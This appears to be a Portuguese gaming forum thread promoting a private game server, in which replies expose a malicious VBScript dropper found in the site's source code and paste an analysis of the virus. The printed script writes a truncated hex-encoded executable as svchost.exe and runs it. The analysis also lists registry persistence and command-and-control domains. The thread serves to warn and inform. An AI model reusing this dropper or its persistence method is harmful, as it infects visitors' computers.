Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

LZT 7.56 Season II


LZT7556
 Compartilhar

Posts Recomendados

Boa Noite Galera, Quer um Servidor decente? Um servidor Que vale a Pena Jogar ? NOVO DOMINIO DO SERVIDOR LZT 7556

É necessário se cadastrar para acessar o conteúdo.
Servidor esta crescendo cada dia mais esta ficando muito bom jogar e divertido, garanto a todos nao se arrependeram de jogar, entrem e participem do evento que esta rolando e vamos ao PVP!!

Rer3aPx.jpg

VAI FICAR DE FORA?

hcEKXN1.jpg

Link para o comentário
Compartilhar em outros sites

Boa Noite Galera, Quer um Servidor decente? Um servidor Que vale a Pena Jogar ? NOVO DOMINIO DO SERVIDOR LZT 7556

É necessário se cadastrar para acessar o conteúdo.
Servidor esta crescendo cada dia mais esta ficando muito bom jogar e divertido, garanto a todos nao se arrependeram de jogar, entrem e participem do evento que esta rolando e vamos ao PVP!!

Rer3aPx.jpg

VAI FICAR DE FORA?

hcEKXN1.jpg

 

 

É isso ai vamo que vamo

Link para o comentário
Compartilhar em outros sites

para que esse script no codigo fonte do site:

 

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B8000000D900BF07400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000001930732C5D511D7F5D511D7F5D511D7F0480127F5F511D7F748B407F1D501D7F9699047F40511D7F8F5C037F5C511D7F9E5E427F7F511D7FFA35007F51511D7FE23C207F5C511D7F526963685D511D7F000000000000000000000000000000000000000000000000504500004C010500894431470000000000000000E0000F010B0108010024000000C0000000020000FC1000000010000000400000000040000010000000020000040000000500010004000000000000000000020000040000000000000200008000002000002000000000200000200000000000001000000000000000000000008815000064000000006000008C0700004D1901006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000E80000000000000000000000000000000000000000000000000000002E74657874000000002400000010000000240000

Link para o comentário
Compartilhar em outros sites

para que esse script no codigo fonte do site:

 

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B8000000D900BF07400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000001930732C5D511D7F5D511D7F5D511D7F0480127F5F511D7F748B407F1D501D7F9699047F40511D7F8F5C037F5C511D7F9E5E427F7F511D7FFA35007F51511D7FE23C207F5C511D7F526963685D511D7F000000000000000000000000000000000000000000000000504500004C010500894431470000000000000000E0000F010B0108010024000000C0000000020000FC1000000010000000400000000040000010000000020000040000000500010004000000000000000000020000040000000000000200008000002000002000000000200000200000000000001000000000000000000000008815000064000000006000008C0700004D1901006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000E80000000000000000000000000000000000000000000000000000002E74657874000000002400000010000000240000

 

o código e malicioso retire ele do site

O Svchost.exe é um processo no computador que hospeda, ou contém, outros serviços individuais que o Windows usa para executar várias funções. Por exemplo, o Windows Defender usa um serviço que é hospedado por um processo svchost.exe.

 

Pode haver várias instâncias do svchost.exe em execução no computador, com cada instância contendo diferentes serviços. Uma instância do svchost.exe pode hospedar um único serviço de um programa, e outra instância pode hospedar vários serviços relacionados ao Windows. Você pode usar o Gerenciador de Tarefas para ver os serviços que estão em execução em cada instância do svchost.exe.

 

 

Infecção arquivo

 

O vírus infecta arquivos com as seguintes extensões:

 

exe

 

html

 

dll

 

htm

 

Arquivos executivos e bibliotecas de ligação dinâmica do Windows são infectados pela adição do corpo do vírus no final da última secção PE do arquivo de destino. Com isso, um ponto de entrada para o programa de muda de tal forma a permitir que o código do vírus para controlá-lo. Enquanto infectar o HTML, arquivos HTM, o script a seguir é adicionado no final do documento de destino:

 

<SCRIPT

 

Language = VBScript> <! -

 

DropFileName = "svchost.exe"

 

WriteData = "4D5A ... (corpo do vírus binário)"

 

Definir FSO = CreateObject ("Scripting.FileSystemObject")

 

DropPath = FSO.GetSpecialFolder (2) e "\" & DropFileName

 

if

 

FSO.FileExists (DropPath) = False

 

while

 

Definir FileObj = FSO.CreateTextFile (DropPath, True)

 

Para i = 1 To Len (WriteData) Passo 2

 

FileObj.Write Chr (CLng ("& H" & Mid (WriteData, i, 2)))

 

Next

 

FileObj.Close

 

Acabar se

 

Definir WshShell = CreateObject ("WScript.Shell")

 

WSHshell.Run DropPath, 0

 

// -> </ SCRIPT>

 

Assim, a cada lançamento, o corpo do vírus é guardado para a pasta temporária do usuário atual como

 

% Temp% \ svchost.exe

 

e lançou para execução.

 

Payload

 

Uma vez que o arquivo infectado é iniciado, o Trojan decifra e extrai o seguinte arquivo de seu corpo:

 

% WorkDir% \ <nome do arquivo infectado a ser lançado> Srv.exe

 

Em seguida, o arquivo criado é lançado para a execução. Com isso, uma cópia do arquivo é criado e lançado:

 

% Arquivos de Programas% \ Microsoft \ WaterMark.exe

 

Em seguida, o processo de "WaterMark.exe" lança um exemplo do processo de sistema "svchost.exe" e injeta seu código para este processo que executa as seguintes ações:

 

Cria um identificador único, com o seguinte nome para controlar a singularidade do seu processo no sistema:

 

Global \ SYSTEM_DEMETRA_MAIN

 

Modifica um valor de chave de registro para executar automaticamente uma cópia software malicioso criado anteriormente:

 

[HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]

 

"Userinit" = "% System% \ userinit.exe ,,% Arquivos de Programas% \ Microsoft \ watermark.exe"

 

Com isso, a cópia é lançado pelo processo "winlogon.exe" mesmo se um computador for iniciado em um modo seguro.

 

Impede modificando chave de registro autorun, bem como o arquivo "WaterMark.exe".

 

Cria um arquivo de configuração para armazenar as configurações atuais do software malicioso:

 

% System% \ dmlconf.dat

 

Visite o seguinte recurso para verificar se há uma conexão com a Internet:

 

Google com

 

Percebe o backdoor. Para obter uma lista de comandos, ele se conecta aos servidores:

 

tybdtyutjfyvetscev.com

 

ervwetyrbuyouiylkdhrbt.com

 

tybsyiutnrtvtybdrser.com

 

Dependendo do comando (s) começa a partir do intruso, o backdoor pode realizar as seguintes ações:

 

- Upload de arquivos para o computador infectado e lançá-los para execução.

 

- Conectar a outro servidor para obter comandos.

 

O código injetado no espaço de endereço do processo "svchost.exe" executa uma funcionalidade descrita na Espalhando sobre removíveis Dispositivos de Armazenamento e seções de infecção de arquivos.

 

 

fonte:

É necessário se cadastrar para acessar o conteúdo.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.